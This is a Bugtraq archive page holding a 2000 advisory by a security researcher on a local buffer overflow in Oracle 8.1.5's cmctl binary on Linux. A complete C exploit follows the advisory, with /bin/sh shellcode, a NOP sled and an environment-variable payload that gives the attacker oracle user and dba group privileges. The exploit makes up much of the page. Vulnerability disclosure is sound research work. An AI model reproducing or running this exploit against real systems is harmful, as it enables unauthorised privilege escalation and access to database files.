Home page logo
/

bugtraq logo Bugtraq mailing list archives

vulnerability in Connection Manager Control binary in Oracle 8.1.5 Linux Platform.
From: Juan Manuel Pascual Escriba <pask () PLAZASITE COM>
Date: Mon, 20 Nov 2000 12:57:42 +0100

Hello Elias


        Colud you make public this advisory. Oracle people dont send an
answer in 6 days. Please cut this lines.


                                                                Thanks




                      WWW.PLAZASITE.COM
                  System & Security Division

   Title:     Vulnerability in cmctl in Oracle 8.1.5
    Date:     13-11-2000
Platform:     Only tested in Linux, but can be exported to others.
  Impact:     Any user gain euid=oracle & egid=dba.
  Author:     Juan Manuel Pascual (pask () plazasite com)
  Status:     Vendor Contacted. Details Below


OVERVIEW:

    cmctl is a Connection Manager Control binary


PROBLEM SUMMARY:

    There is a buffer overflow in cmctl that can be use by local
users to obtain euid of oracle user and egid to dba. With the default
instalation oracle user owns all database files.


IMPACT:

    Any user with local access, can gain euid= oracle an egid=dba


SOLUTION:

    Maybe a chmod -s ;-)))).


STATUS:

    Vendor was contacted 13/1.1 No answers were received in last
4 days.

----------------
This vulnerability was researched by:
Juan Manuel Pascual Escriba            pask () plazasite com



/*
Exploit Code for cmctl in Oracle 8.1.5 (8i) for Linux. I tested in RH
6.2
and 6.1. Is possible to export to others platforms.

If someone exports this to Sparc please tell me.

synopsis: buffer overflow in cmctl
Impact:   any user gain euid=oracle and egid=dba.


Dedicated to cmlc guys: juaroflin, oscar, ismak, blas, blackbas and
others.
Thanks for your patience and time.

Special Thanks to my favourite DBA. Xavi "de verdad como sois" Morales.
*/


#include <stdio.h>
#include <stdlib.h>

#define DEFAULT_OFFSET                    1
#define DEFAULT_BUFFER_SIZE             350
#define NOP                            0x90
#define BINARY  "/usr/local/oracle8i/app/oracle/product/8.1.5/bin/cmctl
echo $pakito"


char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_sp(void) {
   __asm__("movl %esp,%eax");
}

main(int argc, char *argv[]) {
  char *buff, *ptr,*name[3],environ[100],binary[120];
  long *addr_ptr, addr;
  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
  int i;


  if (argc > 1) offset  = atoi(argv[1]);
        else
                {
                printf("Use ./cmctl_start Offset\n");
                exit(1);
                }


  buff = malloc(bsize);
  addr = get_sp() - offset;
  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i+=4)
    *(addr_ptr++) = addr;

  for (i = 0; i < bsize/2; i++)
    buff[i] = NOP;

  ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  buff[bsize - 1] = '\0';
setenv("pakito",buff,1);

system(BINARY);
}

--


                " In God We trust, Others We monitor "

        -------------------------------------------------------------
         Juan Manuel Pascual Escribá        Administrador de Sistemas
         PlazaSite S.A.                         c/ Tomás Bretón 32-38
         08950 Esplugues de Llobregat           (Barcelona),    SPAIN
         Ph: +34 93 3717398                       Fax: +34 93 3711968
         mob: 667591142                     Email: pask () plazasite com
        -------------------------------------------------------------


  By Date           By Thread  

Current thread:
  • vulnerability in Connection Manager Control binary in Oracle 8.1.5 Linux Platform. Juan Manuel Pascual Escriba (Nov 21)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]